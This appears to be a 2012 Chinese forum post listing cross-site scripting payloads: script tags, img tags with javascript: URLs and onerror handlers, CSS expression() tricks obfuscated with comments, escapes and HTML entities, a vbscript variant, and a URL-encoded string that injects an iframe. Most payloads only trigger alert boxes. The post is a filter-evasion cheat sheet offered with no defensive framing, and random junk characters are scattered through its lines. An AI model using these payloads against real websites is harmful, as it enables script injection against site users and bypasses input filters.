<script>alert("跨站")</script> (最常用)
- C- Q, g/ q& S! E' L<img scr=javascript:alert("跨站")></img>) R y! e$ s/ {7 I1 g! I
<img scr="javascript: alert(/跨站/)></img>1 ]) U, K' m% S1 Q
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)+ v, f) X0 @0 n1 E, I I
<img scr="#" onerror=alert(/跨站/)></img>
. l+ Z5 `5 n# v8 O, \<img scr="#" style="xss:expression(alert(/xss/));"></img>: U8 f2 j2 R( j8 U K& H# @; k
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)- Z. e( A4 f }2 N8 J3 [6 L/ e
<img src=vbscript:msgbox ("xss")></img>' R# v+ ?6 S( T2 U, ~# ?# W1 y
<style> input {left:expression (alert('xss'))}</style>, b8 w) \. G' ?; h0 T
<div style={left:expression (alert('xss'))}></div>+ r. }4 ?6 c7 k7 `, M
<div style={left:exp/* */ression (alert('xss'))}></div>
/ o1 l- c1 n* J) B ^<div style={left:\0065\0078ression (alert('xss'))}></div>" X" {( \) o8 R* O3 \& V
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>5 W; ]+ b- [& n1 l
unicode <div style="{left:expRessioN (alert('xss'))}">
`7 B- B2 \3 i* E$ x& X" ]) O7 y- S: [
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["% A) Z9 g/ n3 n; h" ^" L
|
发表于 2012-9-15 14:09:13
收藏
支持
反对